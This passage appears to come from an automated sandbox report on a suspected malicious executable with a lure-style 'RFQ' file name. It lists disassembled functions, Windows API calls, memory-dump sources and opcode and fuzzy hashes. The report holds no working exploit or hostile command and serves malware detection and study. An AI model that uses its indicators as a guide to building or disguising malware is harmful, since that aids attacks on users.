                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: u,D
                                                        • API String ID: 4104443479-3858472334
                                                        • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                        • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                        • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                        • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                        Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • wsprintfW.USER32 ref: 0045612A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend_mallocwsprintf
                                                        • String ID: %d/%02d/%02d
                                                        • API String ID: 1262938277-328681919
                                                        • Opcode ID: 7568e53d503701dc6c53574dfbed37be0c9226c9331a2ec32bea4e30f7db6fe8
                                                        • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                        • Opcode Fuzzy Hash: 7568e53d503701dc6c53574dfbed37be0c9226c9331a2ec32bea4e30f7db6fe8
                                                        • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                        Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetCloseHandle.WININET(?), ref: 00442663
                                                        • InternetCloseHandle.WININET ref: 00442668
                                                          • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CloseHandleInternet$ObjectSingleWait
                                                        • String ID: aeB
                                                        • API String ID: 857135153-906807131
                                                        • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                        • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                        • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                        • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                        Function 00433244 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe, xrefs: 0043324B
                                                        • ^B, xrefs: 00433248
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _wcsncpy
                                                        • String ID: ^B$C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe
                                                        • API String ID: 1735881322-2818189993
                                                        • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                        • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                                        • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                        • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                                        Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                        • PostMessageW.USER32(00000000), ref: 00441C05
                                                          • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                        • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                        • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                        • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                        Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                          • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                        • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                        • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                        • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                        Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                          • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Message_doexit
                                                        • String ID: AutoIt$Error allocating memory.
                                                        • API String ID: 1993061046-4017498283
                                                        • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                        • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                        • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                        • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D